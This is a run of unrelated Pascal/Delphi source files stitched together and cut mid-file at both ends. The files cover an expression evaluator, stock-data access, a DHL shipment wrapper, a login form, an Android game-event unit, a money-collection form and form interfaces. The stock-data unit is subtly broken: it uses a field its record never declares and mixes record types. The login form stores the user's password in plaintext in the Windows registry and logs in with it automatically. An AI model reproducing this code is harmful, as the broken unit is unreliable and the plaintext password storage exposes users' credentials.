j:=i+7 to length(s) do begin If s[j]='(' then sc:=sc+1; If s[j]=')' then begin sc:=sc-1; If sc=0 then begin ns:=j; break; end; end; end; s1:=copy(s,i+7,ns-i-7); r:=arctan(LoadFloat(s1,Script)); s1:='('+floattostr(r)+')'; delete(s,i,ns-i+1); insert(s1,s,i); end; If (s[i]='A') then if (s[i+1]='r') and (s[i+2]='c') and (s[i+3]='C') and (s[i+4]='c') and (s[i+5]='t') and (s[i+6]='a') and (s[i+7]='n') and (s[i+8]='(') then begin sc:=1; noneno:=i+1; none:=false; for j:=i+9 to length(s) do begin If s[j]='(' then sc:=sc+1; If s[j]=')' then begin sc:=sc-1; If sc=0 then begin ns:=j; break; end; end; end; s1:=copy(s,i+9,ns-i-9); r:=-arctan(LoadFloat(s1,Script))+pi/2; s1:='('+floattostr(r)+')'; delete(s,i,ns-i+1); insert(s1,s,i); end; If (s[i]='E') then if (s[i+1]='e') and (s[i+2]='p') and (s[i+3]='(') then begin sc:=1; noneno:=i+1; none:=false; for j:=i+4 to length(s) do begin If s[j]='(' then sc:=sc+1; If s[j]=')' then begin sc:=sc-1; If sc=0 then begin ns:=j; break; end; end; end; s1:=copy(s,i+4,ns-i-4); r:=exp(LoadFloat(s1,Script)); s1:='('+floattostr(r)+')'; delete(s,i,ns-i+1); insert(s1,s,i); end; If (s[i]='L') then if (s[i+1]='n') and (s[i+2]='(') then begin sc:=1; none:=false; noneno:=i+1; for j:=i+3 to length(s) do begin If s[j]='(' then sc:=sc+1; If s[j]=')' then begin sc:=sc-1; If sc=0 then begin ns:=j; break; end; end; end; s1:=copy(s,i+3,ns-i-3); temp:=LoadFloat(s1,Script); If temp>0 then r:=ln(temp) else raise Ematherror.Create('Invalid Floating Operator. LN needs value >0'); s1:='('+floattostr(r)+')'; delete(s,i,ns-i+1); insert(s1,s,i); end; If (s[i]='L') then if (s[i+1]='g') and (s[i+2]='(') then begin sc:=1; none:=false; noneno:=i+1; for j:=i+3 to length(s) do begin If s[j]='(' then sc:=sc+1; If s[j]=')' then begin sc:=sc-1; If sc=0 then begin ns:=j; break; end; end; end; s1:=copy(s,i+3,ns-i-3); temp:=LoadFloat(s1,Script); If temp>0 then r:=ln(temp)/ln(10) else raise Ematherror.Create('Invalid Floating Operator. LG needs value >0'); s1:='('+floattostr(r)+')'; delete(s,i,ns-i+1); insert(s1,s,i); end; If (s[i]='I') then if (s[i+1]='F') and (s[i+2]='(') then begin sc:=0; noneno:=i+1; nv1:=0; none:=false; endif:=length(s); for j:=i+2 to length(s) do begin If s[j]='(' then sc:=sc+1; If s[j]=')' then sc:=sc-1; If sc=0 then begin endif:=j; break; end; end; sc:=0; For j:=i+3 to length(s) do begin If s[j]='(' then sc:=sc+1; If s[j]=')' then sc:=sc-1; If (s[j]=';') and (sc=0) then begin nv1:=j; break; end; end; sc:=1; sv1:=copy(s,i+3,nv1-i-3); for j:=nv1+1 to length(s) do begin If s[j]='(' then sc:=sc+1; If s[j]=')' then sc:=sc-1; If (s[j]=';') and (sc=1) then begin ns:=j; break; end; end; s1:=copy(s,nv1+1,ns-nv1-1); for j:=ns to length(s) do begin If s[j]='(' then sc:=sc+1; If s[j]=')' then begin sc:=sc-1; If sc=0 then begin nv1:=j; break; end; end; end; sv2:=copy(s,ns+1,nv1-ns-1); y:=0; for z:=1 to length(sv1) do begin If (sv1[z]='>') and (sv1[z+1]<>'=') then begin znak:=[ZBolhe]; y:=z; break; end; If (sv1[z]='<') and (sv1[z+1]<>'=') and (sv1[z+1]<>'>') then begin znak:=[ZMenhe]; y:=z; break; end; If sv1[z]='=' then begin znak:=[ZRavno]; y:=z; break; end; If (sv1[z]='>') and (sv1[z+1]='=') then begin znak:=[ZBolheRavno]; y:=z; break; end; If (sv1[z]='<') and (sv1[z+1]='=') then begin znak:=[ZMenheRavno]; y:=z; break; end; If (sv1[z]='<') and (sv1[z+1]='>') then begin znak:=[ZNeRavno]; y:=z; break; end; end; If (znak=[Zbolhe]) or (znak=[ZMenhe]) or (znak=[ZRavno]) then begin ysl1:=copy(sv1,1,y-1); ysl2:=copy(sv1,y+1,length(sv1)-y); end else begin ysl1:=copy(sv1,1,y-1); ysl2:=copy(sv1,y+2,length(sv1)-y-1); end; znak:=znak; temp:=0; If znak=[ZRavno] then begin If StringToFloatScript(ysl1,Script)=StringToFloatScript(ysl2,Script) then temp:=StringToFloatScript(s1,Script) else temp:=StringToFloatScript(sv2,Script); end; If znak=[ZNeRavno] then begin If StringToFloatScript(ysl1,Script)<>StringToFloatScript(ysl2,Script) then temp:=StringToFloatScript(s1,Script) else temp:=StringToFloatScript(sv2,Script); end; If znak=[ZBolhe] then begin If StringToFloatScript(ysl1,Script)>StringToFloatScript(ysl2,Script) then temp:=StringToFloatScript(s1,Script) else temp:=StringToFloatScript(sv2,Script); end; If znak=[ZMenhe] then begin If StringToFloatScript(ysl1,Script)<StringToFloatScript(ysl2,Script) then temp:=StringToFloatScript(s1,Script) else temp:=StringToFloatScript(sv2,Script); end; If znak=[ZMenheRavno] then begin If StringToFloatScript(ysl1,Script)<=StringToFloatScript(ysl2,Script) then temp:=StringToFloatScript(s1,Script) else temp:=StringToFloatScript(sv2,Script); end; If znak=[ZBolheRavno] then begin If StringToFloatScript(ysl1,Script)>=StringToFloatScript(ysl2,Script) then temp:=StringToFloatScript(s1,Script) else temp:=StringToFloatScript(sv2,Script); end; r:=temp; s1:='('+floattostr(r)+')'; delete(s,i,endif-i+1); insert(s1,s,i); break; end; end; Until none; result:=s; end; Function StringToFloatScript(const fstr : string; const Script : TScript) : real; var s,s1,s2,s3,s4:string; breakzikl : boolean; plus,i,a,b,sc,j:integer; lr:real; f : Tfunc; begin result:=0; s:=fstr; If s='' then exit; If s[1]<>'-' then s:='0+'+s else s:='0'+s; s:=DeleteProbeli(s); Repeat breakzikl:=true; for i:=1 to length(s) do If (s[i]='(') then If findprevioschar(s,i-1,1)<>'F' then if findprevioschar(s,i-1,2)<>'G' then begin sc:=0; for j:=i to length(s) do begin If s[j]='(' then sc:=sc+1; If s[j]=')' then begin sc:=sc-1; If sc=0 then If findexpression(copy(s,i+1,j-i-1))=true then begin s4:=copy(s,i+1,j-i-1); try s4:=floattostr(StringToFloatScript(s4,Script)); delete(s,i+1,j-i-1); insert(s4,s,i+1); breakzikl:=false; break; except end; end; end; end; end; Until breakzikl=true; s:=replacefunctionstoresult(s,Script); try repeat plus:=findnextf(s).Nofunction; f:=findnextf(s).Typefunction; s1:=copy(s,findnextl(plus,s)+1,plus-findnextl(plus,s)-1); s2:=copy(s,plus+1,findnextr(plus,s)-plus-1); a:=findnextl(plus,s); b:=findnextr(plus,s); system.delete(s,a+1,b-a-1); lr:=0; If f=[fnone] then break; If f=[Fpower] then lr:=power(LoadFloat(s1,Script),LoadFloat(s2,Script)); If f=[fplus] then lr:=LoadFloat(s1,Script)+LoadFloat(s2,Script); If f=[fminus] then lr:=LoadFloat(s1,Script)-LoadFloat(s2,Script); If f=[fdivide] then begin If LoadFloat(s2,Script)<>0 then lr:=LoadFloat(s1,Script)/LoadFloat(s2,Script) else lr:=MaxExtended//raise EMathError.create('Error by devisiot on zerro');//lr:=MaxExtended; end; If f=[fmultiply] then lr:=LoadFloat(s1,Script)*LoadFloat(s2,Script); If f=[F_OR] then begin if (LoadFloat(s1,Script)<>0) or (LoadFloat(s2,Script)<>0) then lr:=1 else lr:=0; end; If f=[F_AND] then begin if (LoadFloat(s1,Script)<>0) and (LoadFloat(s2,Script)<>0) then lr:=1 else lr:=0; end; If f=[F_XOR] then begin if (LoadFloat(s1,Script)<>0) xor (LoadFloat(s2,Script)<>0) then lr:=1 else lr:=0; end; If f=[F_BOLSHE] then begin if LoadFloat(s1,Script) > LoadFloat(s2,Script) then lr:=1 else lr:=0; end; If f=[F_MENSHE] then begin if LoadFloat(s1,Script) < LoadFloat(s2,Script) then lr:=1 else lr:=0; end; If f=[F_RAVNO] then begin if s1 = s2 then lr:=1 else lr:=0; end; If lr>=0 then s3:=floattostr(lr) else s3:='('+floattostr(lr)+')'; insert(s3,s,a+1); until findnextf(s).Typefunction=[fnone]; except raise EMathError.create('Error'); end; result:=LoadFloat(s,Script); end; Function findexpression(const str : String):boolean; var i,sc:integer; pass:boolean; begin result:=false; pass:=true; sc:=0; for i:=1 to length(str) do begin If (str[i]='(') then sc:=sc+1; If (str[i]=')') then sc:=sc-1; If sc<0 then pass:=false; end; for i:=length(str) downto 1 do begin If (str[i]=')') then sc:=sc+1; If (str[i]='(') then sc:=sc-1; If sc<0 then pass:=false; end; If pass then for i:=1 to length(str) do begin If (((str[i]='+') or (str[i]='-')) and (i<>1) and (str[i-1]<>'E')) or (str[i]='/') or (str[i]='*') or (str[i]='^') or (str[i]='~') or (str[i]='|') or (str[i]='&') or (str[i]='>') or (str[i]='<') or (str[i]='=') or (str[i]='S') or (str[i]='N') or ((str[i]='E') and (str[i+1]='X')) or (str[i]='I') or (str[i]='R') then begin result:=true; break; end; end; end; end.
unit StockWeightDataAccess; interface uses define_dealItem, BaseDataSet, QuickList_int, define_price, define_datasrc, define_stock_quotes; type TStockWeightData = record DealItem : PRT_DealItem; IsDataChangedStatus: Byte; WeightData : TALIntegerList; FirstDealDate : Word; // 2 LastDealDate : Word; // 2 最后记录交易时间 DataSource : TDealDataSource; end; TStockWeightDataAccess = class(TBaseDataSetAccess) protected fStockWeightData: TStockWeightData; function GetFirstDealDate: Word; procedure SetFirstDealDate(const Value: Word); function GetLastDealDate: Word; procedure SetLastDealDate(const Value: Word); function GetEndDealDate: Word; procedure SetEndDealDate(const Value: Word); procedure SetStockItem(AStockItem: PRT_DealItem); function GetRecordItem(AIndex: integer): Pointer; override; function GetRecordCount: Integer; override; public constructor Create(AStockItem: PRT_DealItem; ADataSrc: TDealDataSource); destructor Destroy; override; function FindRecord(ADate: Integer): PRT_Stock_Weight; function CheckOutRecord(ADate: Word): PRT_Stock_Weight; function DoGetRecords: integer; function DoGetStockOpenPrice(AIndex: integer): double; function DoGetStockClosePrice(AIndex: integer): double; function DoGetStockHighPrice(AIndex: integer): double; function DoGetStockLowPrice(AIndex: integer): double; procedure Sort; override; procedure Clear; override; property FirstDealDate: Word read GetFirstDealDate; property LastDealDate: Word read GetLastDealDate; property EndDealDate: Word read GetEndDealDate write SetEndDealDate; property StockItem: PRT_DealItem read fStockWeightData.DealItem write SetStockItem; property DataSource: TDealDataSource read fStockWeightData.DataSource write fStockWeightData.DataSource; end; implementation uses QuickSortList, SysUtils; { TStockWeightDataAccess } constructor TStockWeightDataAccess.Create(AStockItem: PRT_DealItem; ADataSrc: TDealDataSource); begin //inherited; FillChar(fStockWeightData, SizeOf(fStockWeightData), 0); fStockWeightData.DealItem := AStockItem; fStockWeightData.WeightData := TALIntegerList.Create; fStockWeightData.WeightData.Clear; fStockWeightData.WeightData.Duplicates := QuickSortList.lstDupIgnore; fStockWeightData.FirstDealDate := 0; // 2 fStockWeightData.LastDealDate := 0; // 2 最后记录交易时间 fStockWeightData.DataSource := ADataSrc; end; destructor TStockWeightDataAccess.Destroy; begin Clear; FreeAndNil(fStockWeightData.DayDealData); inherited; end; procedure TStockWeightDataAccess.Clear; var i: integer; tmpQuoteDay: PRT_Quote_Day; begin if nil <> fStockWeightData.WeightData then begin for i := fStockWeightData.WeightData.Count - 1 downto 0 do begin tmpQuoteDay := PRT_Quote_Day(fStockWeightData.WeightData.Objects[i]); FreeMem(tmpQuoteDay); end; fStockWeightData.WeightData.Clear; end; end; procedure TStockWeightDataAccess.SetStockItem(AStockItem: PRT_DealItem); begin if nil <> AStockItem then begin if fStockWeightData.DealItem <> AStockItem then begin end; end; fStockWeightData.DealItem := AStockItem; if nil <> fStockWeightData.DealItem then begin end; end; function TStockWeightDataAccess.GetFirstDealDate: Word; begin Result := fStockWeightData.FirstDealDate; end; procedure TStockWeightDataAccess.SetFirstDealDate(const Value: Word); begin fStockWeightData.FirstDealDate := Value; end; function TStockWeightDataAccess.GetLastDealDate: Word; begin Result := fStockWeightData.LastDealDate; end; procedure TStockWeightDataAccess.SetLastDealDate(const Value: Word); begin fStockWeightData.LastDealDate := Value; end; function TStockWeightDataAccess.GetEndDealDate: Word; begin Result := 0; end; procedure TStockWeightDataAccess.SetEndDealDate(const Value: Word); begin end; function TStockWeightDataAccess.GetRecordCount: Integer; begin Result := fStockWeightData.WeightData.Count; end; function TStockWeightDataAccess.GetRecordItem(AIndex: integer): Pointer; begin Result := fStockWeightData.WeightData.Objects[AIndex]; end; procedure TStockWeightDataAccess.Sort; begin fStockWeightData.WeightData.Sort; end; function TStockWeightDataAccess.CheckOutRecord(ADate: Word): PRT_Stock_Weight; begin Result := nil; if ADate < 1 then exit; Result := FindRecord(ADate); if nil = Result then begin if fStockWeightData.FirstDealDate = 0 then fStockWeightData.FirstDealDate := ADate; if fStockWeightData.FirstDealDate > ADate then fStockWeightData.FirstDealDate := ADate; if fStockWeightData.LastDealDate < ADate then fStockWeightData.LastDealDate := ADate; Result := System.New(PRT_Quote_Day); FillChar(Result^, SizeOf(TRT_Quote_Day), 0); Result.DealDate.Value := ADate; fStockWeightData.DayDealData.AddObject(ADate, TObject(Result)); end; end; function TStockWeightDataAccess.FindRecord(ADate: Integer): PRT_Quote_Day; var tmpPos: integer; begin Result := nil; tmpPos := fStockWeightData.DayDealData.IndexOf(ADate); if 0 <= tmpPos then Result := PRT_Quote_Day(fStockWeightData.DayDealData.Objects[tmpPos]); end; function TStockWeightDataAccess.DoGetStockOpenPrice(AIndex: integer): double; begin Result := PRT_Quote_Day(RecordItem[AIndex]).PriceRange.PriceOpen.Value; end; function TStockWeightDataAccess.DoGetStockClosePrice(AIndex: integer): double; begin Result := PRT_Quote_Day(RecordItem[AIndex]).PriceRange.PriceClose.Value; end; function TStockWeightDataAccess.DoGetStockHighPrice(AIndex: integer): double; begin Result := PRT_Quote_Day(RecordItem[AIndex]).PriceRange.PriceHigh.Value; end; function TStockWeightDataAccess.DoGetStockLowPrice(AIndex: integer): double; begin Result := PRT_Quote_Day(RecordItem[AIndex]).PriceRange.PriceLow.Value; end; function TStockWeightDataAccess.DoGetRecords: integer; begin Result := Self.RecordCount; end; end.
unit Objekt.DHLShipment; interface uses SysUtils, Classes, geschaeftskundenversand_api_2, Objekt.DHLShipmentdetails, Objekt.DHLShipper, Objekt.DHLReceiver; type TDHLShipment = class private fShipmentAPI: Shipment; fShipmentdetails: TDHLShipmentdetails; fShipper: TDHLShipper; fReceiver: TDHLReceiver; public constructor Create; destructor Destroy; override; function ShipmentAPI: Shipment; property Shipmentdetails: TDHLShipmentdetails read fShipmentdetails write fShipmentdetails; property Shipper: TDHLShipper read fShipper write fShipper; property Receiver: TDHLReceiver read fReceiver write fReceiver; end; implementation { TDHLShipment } constructor TDHLShipment.Create; begin fShipmentAPI := Shipment.Create; fShipper := TDHLShipper.Create; fReceiver := TDHLReceiver.Create; fShipmentdetails := TDHLShipmentdetails.Create; fShipmentAPI.ShipmentDetails := Shipmentdetails.ShipmentDetailsTypeTypeAPI; fShipmentAPI.Shipper := fShipper.ShipperTypeAPI; fShipmentAPI.Receiver := fReceiver.ReceiverTypeAPI; end; destructor TDHLShipment.Destroy; begin FreeAndNil(fReceiver); FreeAndNil(fShipper); FreeAndNil(fShipmentdetails); inherited; end; function TDHLShipment.ShipmentAPI: Shipment; begin Result := fShipmentAPI; end; end.
unit gr_AccessForm; interface uses Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms, Dialogs, cxControls, cxContainer, cxEdit, cxTextEdit, cxLookAndFeelPainters, cxLabel, StdCtrls, cxButtons, ExtCtrls, AccMGMT, Registry, gr_uMessage, ActnList, gr_uCommonTypes, gr_uCommonConsts, gr_uCommonProc, Buttons; type TFAccess = class(TForm) ActionList: TActionList; ActionYes: TAction; Image5: TImage; Image4: TImage; UserEdit: TcxTextEdit; LoginEdit: TcxTextEdit; SpeedButton1: TSpeedButton; CloseSpeedButton: TSpeedButton; CancelBtn: TSpeedButton; YesBtn: TSpeedButton; ActionCancel: TAction; procedure CancelBtnClick(Sender: TObject); procedure UserEditKeyUp(Sender: TObject; var Key: Word; Shift: TShiftState); procedure ActionYesExecute(Sender: TObject); procedure LoginEditKeyUp(Sender: TObject; var Key: Word; Shift: TShiftState); procedure FormCreate(Sender: TObject); procedure SaveUserData(Sender:TObject); procedure CloseSpeedButtonClick(Sender: TObject); procedure SpeedButton1Click(Sender: TObject); procedure ActionCancelExecute(Sender: TObject); private AccessResult:TUser; countoftry:byte; CurrentLanguageIndex:byte; pIsAlready:boolean; public constructor Create(AOwner:TComponent);override; Property Result:TUser read AccessResult; property IsAlready:Boolean read pIsAlready; end; function ShowAccess(AOwner:TComponent):TUser;stdcall; exports ShowAccess; implementation {$R *.dfm} function ShowAccess(AOwner:TComponent):TUser;stdcall; var FormAccess:TFAccess; Res:TUser; begin FormAccess:=TFAccess.Create(AOwner); Res.ID:=0; if (FormAccess.IsAlready) or (FormAccess.ShowModal=mrYes) then Res:=FormAccess.Result; FormAccess.Free; Result:=Res; end; constructor TFAccess.Create(AOwner:TComponent); var reg: TRegistry; begin inherited Create(AOwner); pIsAlready:=False; CurrentLanguageIndex := IndexLanguage; countoftry := 0; Caption := Access_Caption[CurrentLanguageIndex]; YesBtn.Hint := YesBtn.Caption; CancelBtn.Hint := CancelBtn.Caption+' (Esc)'; reg:=TRegistry.Create; try reg.RootKey:=HKEY_CURRENT_USER; if reg.OpenKey('\Software\Grant\Login\',False) then begin UserEdit.Text:=reg.ReadString('Login'); end finally reg.Free; end; end; procedure TFAccess.CancelBtnClick(Sender: TObject); begin ModalResult:=mrNo; end; procedure TFAccess.UserEditKeyUp(Sender: TObject; var Key: Word; Shift: TShiftState); begin if Key=VK_RETURN then LoginEdit.SetFocus; end; procedure TFAccess.ActionYesExecute(Sender: TObject); var ResultInfo:TResultInfo; begin inc(countoftry); //****************************************************************************** // соединиться с системой безопасности try ResultInfo := fibInitConnection(UserEdit.Text,LoginEdit.Text); if ResultInfo.ErrorCode <> ACCMGMT_OK then // ошибка begin grShowMessage(ECaption[IndexLanguage],AcMgmtErrMsg(ResultInfo.ErrorCode),mtError,[mbOk]); UserEdit.SetFocus; end else // все пучком begin AccessResult.Id:=GetUserId; AccessResult.Id_Card:=GetCurrentUserIDExt; AccessResult.Fio := GetUserFIO; AccessResult.Name:=UserEdit.Text; AccessResult.DB_Handle:=ResultInfo.DBHandle; AccessResult.DbPath := fibGetCurrentDBPath; pIsAlready:=True; SaveUserData(Sender); if fibCheckPermission('/ROOT/Grant','Belong')=0 then ModalResult:=mrYes end; except on e: Exception do begin MessageDlg('Фатальна помилка у системі безпеки : ' + e.Message, mtError,[mbOk],0); if CountOfTry>=3 then Application.Terminate else Exit; end; end; //****************************************************************************** if countoftry>=3 then Application.Terminate; end; procedure TFAccess.LoginEditKeyUp(Sender: TObject; var Key: Word; Shift: TShiftState); begin if Key=VK_RETURN then ActionYesExecute(Sender); end; procedure TFAccess.FormCreate(Sender: TObject); var Reg:TRegistry; begin reg:=TRegistry.Create; try reg.RootKey:=HKEY_CURRENT_USER; if reg.OpenKey('\Software\Grant\Login\',False) then begin UserEdit.Text:=reg.ReadString('Login'); if reg.OpenKey('\Software\Grant\Login\PassWord',False) then begin LoginEdit.Text:=reg.ReadString('PassWord'); if LoginEdit.Text<>'' then ActionYesExecute(Sender); end; end finally reg.Free; end; end; procedure TFAccess.SaveUserData(Sender:TObject); var reg: TRegistry; begin reg:=TRegistry.Create; try reg.RootKey:=HKEY_CURRENT_USER; if reg.OpenKey('\Software\Grant\Login\',True) then begin reg.WriteString('Login',UserEdit.Text); if reg.OpenKey('\Software\Grant\Login\Password\',False) then reg.WriteString('Password',LoginEdit.Text); end finally reg.Free; end; end; procedure TFAccess.CloseSpeedButtonClick(Sender: TObject); begin Close; end; procedure TFAccess.SpeedButton1Click(Sender: TObject); begin ShowWindow(Application.Handle, SW_SHOWMINIMIZED); end; procedure TFAccess.ActionCancelExecute(Sender: TObject); begin ModalResult:=mrCancel; end; end.
namespace com.example.android.jetboy; {* * Copyright (C) 2007 The Android Open Source Project * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. *} interface uses android.media, android.view; type /// <summary> /// Base class for any external event passed to the JetBoyThread. This can /// include user input, system events, network input, etc. /// </summary> GameEvent = public class assembly var eventTime: Int64; public constructor; end; /// <summary> /// A GameEvent subclass for key based user input. Values are those used by /// the standard onKey /// </summary> KeyGameEvent = public class(GameEvent) public constructor(aKeyCode: Integer; aUp: Boolean; aMsg: KeyEvent); var keyCode: Integer; var msg: KeyEvent; var up: Boolean; end; /// <summary> /// A GameEvent subclass for events from the JetPlayer. /// </summary> JetGameEvent = public class(GameEvent) public constructor(aPlayer: JetPlayer; aSegment: SmallInt; aTrack, aChannel, aController, aValue: SByte); var player: JetPlayer; var segment: SmallInt; var track: SByte; var channel: SByte; var controller: SByte; var value: SByte; end; implementation constructor GameEvent; begin eventTime := System.currentTimeMillis end; constructor KeyGameEvent(aKeyCode: Integer; aUp: Boolean; aMsg: KeyEvent); begin keyCode := aKeyCode; msg := aMsg; up := aUp end; constructor JetGameEvent(aPlayer: JetPlayer; aSegment: SmallInt; aTrack, aChannel, aController, aValue: SByte); begin player := aPlayer; segment := aSegment; track := aTrack; channel := aChannel; controller := aController; value := aValue end; end.
unit collection; {$mode objfpc}{$H+} interface uses Classes, SysUtils, Forms, Controls, Graphics, Dialogs, Grids, StdCtrls, fphttpclient, Fpjson, jsonparser, superobject, Types, DateUtils; type { TMoneyCollectionForm } TMoneyCollectionForm = class(TForm) BtnCollect: TButton; CollectionData: TStringGrid; procedure BtnCollectClick(Sender: TObject); procedure FormShow(Sender: TObject); private public end; var MoneyCollectionForm: TMoneyCollectionForm; implementation {$R *.lfm} { TMoneyCollectionForm } procedure TMoneyCollectionForm.BtnCollectClick(Sender: TObject); var buttonSelected: Integer; postJson: TJSONObject; begin buttonSelected := MessageDlg('Collect money from station ' + IntToStr(CollectionData.Row) + '?', mtConfirmation, mbOKCancel, 0); if buttonSelected = mrOK then begin postJson := TJSONObject.Create; postJson.Add('id', CollectionData.Row); postJson.Add('money', StrToInt(CollectionData.Cells[1, CollectionData.Row])); With TFPHttpClient.Create(Nil) do try try AddHeader('Content-Type', 'application/json'); RequestBody := TStringStream.Create(postJson.AsJSON); Post('http://localhost:8020/save-collection'); CollectionData.Cells[2, CollectionData.Row] := DateTimeToStr(Now()); CollectionData.Cells[1, CollectionData.Row] := '0'; except On E: Exception do end; finally Free; end; end; end; procedure TMoneyCollectionForm.FormShow(Sender: TObject); var s: TTextStyle; Data: ISuperObject; Station: ISuperObject; Stations: TSuperArray; RequestAnswer: string; ConvertedTime: TDateTime; i, id, timeUnix: integer; begin s := CollectionData.DefaultTextStyle; s.Alignment := taCenter; CollectionData.DefaultTextStyle := s; with TFPHttpClient.Create(nil) do try try RequestAnswer := Get('http://localhost:8020/status-collection'); Data := SO(UTF8Decode(RequestAnswer)); if Data.S['stations'] <> '' then begin Stations := Data.A['stations']; for i := 1 to Stations.Length do begin Station := Stations.O[i - 1]; if Station.AsObject.Exists('id') then begin id := Station.I['id']; if Station.AsObject.Exists('money') then begin CollectionData.Cells[1, id] := IntToStr(Station.I['money']); end else begin CollectionData.Cells[1, id] := '0'; end; if Station.AsObject.Exists('ctime') then begin timeUnix := Station.I['ctime']; convertedTime := UnixToDateTime(timeUnix); CollectionData.Cells[2, id] := DateTimeToStr(convertedTime); end else begin CollectionData.Cells[2, id] := '-----'; end; end; end; end; except On E: Exception do end; finally Free; end; end; end.
unit uFormInterfaces; interface uses Generics.Collections, System.SysUtils, System.Classes, System.TypInfo, Winapi.Windows, Vcl.Graphics, Vcl.Controls, Vcl.Forms, Vcl.ExtCtrls, Vcl.Imaging.Jpeg, Data.DB, UnitDBDeclare, Dmitry.Controls.WebLink, Dmitry.PathProviders, uMemory, uDBForm, uRuntime, uDBEntities; type IFormInterface = interface ['{24769E47-FE80-4FF7-81CC-F8E6C8AA77EC}'] procedure Show; procedure Restore; end; IImageSource = interface(IInterface) ['{382D130E-5746-4A6D-9C15-B2EEEF089F44}'] function GetImage(FileName: string; Bitmap: TBitmap; var Width: Integer; var Height: Integer): Boolean; end; IViewerForm = interface(IFormInterface) ['{951665C9-EDA5-44BD-B833-B5543B58DF04}'] function ShowImage(Sender: TObject; FileName: string): Boolean; function ShowImages(Sender: TObject; Info: TMediaItemCollection): Boolean; function ShowImageInDirectory(FileName: string; ShowPrivate: Boolean): Boolean; function ShowImageInDirectoryEx(FileName: string): Boolean; function NextImage: Boolean; function PreviousImage: Boolean; function Pause: Boolean; function TogglePause: Boolean; function CloseActiveView: Boolean; function CurrentFullImage: TBitmap; procedure DrawTo(Canvas: TCanvas; X, Y: Integer); function ShowPopup(X, Y: Integer): Boolean; function GetImagesCount: Integer; function GetIsFullScreenNow: Boolean; function GetIsSlideShowNow: Boolean; function GetImageIndex: Integer; procedure SetImageIndex(Value: Integer); function GetImageByIndex(Index: Integer): TMediaItem; procedure UpdateImageInfo(Info: TMediaItem); property ImagesCount: Integer read GetImagesCount; property ImageIndex: Integer read GetImageIndex write SetImageIndex; property IsFullScreenNow: Boolean read GetIsFullScreenNow; property IsSlideShowNow: Boolean read GetIsSlideShowNow; property Images[Index: Integer]: TMediaItem read GetImageByIndex; end; IImageEditor = interface(IFormInterface) ['{0C5858BC-AF84-4941-AE8A-B0DF594DA7BF}'] function EditFile(Image: string; BitmapOut: TBitmap): Boolean; function EditImage(Image: TBitmap): Boolean; procedure Close; end; IAboutForm = interface(IFormInterface) ['{319D1068-3734-4229-9264-8922123F31C0}'] procedure Execute; end; IActivationForm = interface(IFormInterface) ['{B2742B2F-4210-4A48-B45E-54AEAD63062F}'] procedure Execute; end; IOptionsForm = interface(IFormInterface) ['{5B8A57BA-3FCB-489C-A849-753BDA0D1356}'] end; IRequestPasswordForm = interface(IFormInterface) ['{7710EB12-321A-44B1-B72A-FD238C450ACD}'] function ForImage(FileName: string): string; function ForImageEx(FileName: string; out AskAgain: Boolean): string; function ForBlob(DF: TField; FileName: string): string; function ForSteganoraphyFile(FileName: string; CRC: Cardinal) : string; function ForManyFiles(FileList: TStrings; CRC: Cardinal; var Skip: Boolean): string; end; IBatchProcessingForm = interface(IFormInterface) ['{DEF35564-F0E4-46DD-A323-8FC6ABF19E3D}'] procedure ExportImages(Owner: TDBForm; List: TMediaItemCollection); procedure ResizeImages(Owner: TDBForm; List: TMediaItemCollection); procedure ConvertImages(Owner: TDBForm; List: TMediaItemCollection); procedure RotateImages(Owner: TDBForm; List: TMediaItemCollection; DefaultRotate: Integer; StartImmediately: Boolean); end; IJpegOptionsForm = interface(IFormInterface) ['{C1F4BB58-77A8-4AF0-A9FD-196470D5AD7D}'] procedure Execute(Section: string = ''); end; ISelectSourceForm = interface(IFormInterface) ['{1945B6CD-8BA1-4D0B-B4CE-F57291FA5419}'] procedure Execute; end; IImportForm = interface(IFormInterface) ['{64D665EF-5407-410D-8B4B-E18CE9F35FC3}'] procedure FromDevice(DeviceName: string); procedure FromDrive(DriveLetter: Char); procedure FromFolder(Folder: string); end; IStringPromtForm = interface(IFormInterface) ['{190CD270-05BA-45D6-9013-079177BCC2D3}'] function Query(Caption, Text: String; var UserString: string): Boolean; end; IEncryptForm = interface(IFormInterface) ['{FB0EA46F-E184-4E16-9F8A-0B4300ED1CFD}'] function QueryPasswordForFile(FileName: string): TEncryptImageOptions; procedure Encrypt(Owner: TDBForm; Text: string; Info: TMediaItemCollection); procedure Decrypt(Owner: TDBForm; Info: TMediaItemCollection); end; ISteganographyForm = interface(IFormInterface) ['{617ABA0A-1313-4319-9F20-7C75737D49FE}'] procedure HideData(InitialFileName: string); procedure ExtractData(InitialFileName: string); end; IShareForm = interface(IFormInterface) ['{2DF99576-6806-4735-90C9-434F2248B1A9}'] procedure Execute(Owner: TDBForm; Info: TMediaItemCollection); end; IShareLinkForm = interface(IFormInterface) ['{25917009-223C-4012-8443-79E14C52C290}'] procedure Execute(Owner: TDBForm; Info: TMediaItemCollection); end; IGroupCreateForm = interface(IFormInterface) ['{9F17471D-49EC-42B4-95B4-D09526D4B0AE}'] procedure CreateGroup; procedure CreateFixedGroup(GroupName, GroupCode: string); procedure CreateGroupByCodeAndImage(GroupCode: string; Image: TJpegImage; out Created: Boolean; out GroupName: string); end; IGroupInfoForm = interface(IFormInterface) ['{F590F498-C6BB-4FB1-8571-5B9D21A63A6B}'] procedure Execute(AOwner: TForm; Group: TGroup; CloseOwner: Boolean); overload; procedure Execute(AOwner: TForm; Group: string; CloseOwner: Boolean); overload; end; IGroupsSelectForm = interface(IFormInterface) ['{541139AB-E20A-41AA-A15A-A063A65C1328}'] procedure Execute(var Groups: TGroups; var KeyWords: string; CanNew: Boolean = True); overload; procedure Execute(var Groups: string; var KeyWords: string; CanNew: Boolean = True); overload; end; ICollectionAddItemForm = interface(IFormInterface) ['{29D8DB10-F2B2-4E1C-ABDA-BCAF9CAC5FDC}'] procedure Execute(Info: TMediaItem); end; ICDExportForm = interface(IFormInterface) ['{72359017-3ABA-4C8F-ACB0-FB2D37798CB4}'] procedure Execute; end; ICDMapperForm = interface(IFormInterface) ['{B45F759D-40DD-4BA5-BA24-950389A5CB3A}'] procedure Execute; end; ISelectLocationForm = interface(IFormInterface) ['{B3298299-4966-42ED-93F4-98C5790D1675}'] function Execute(Title, StartPath: string; 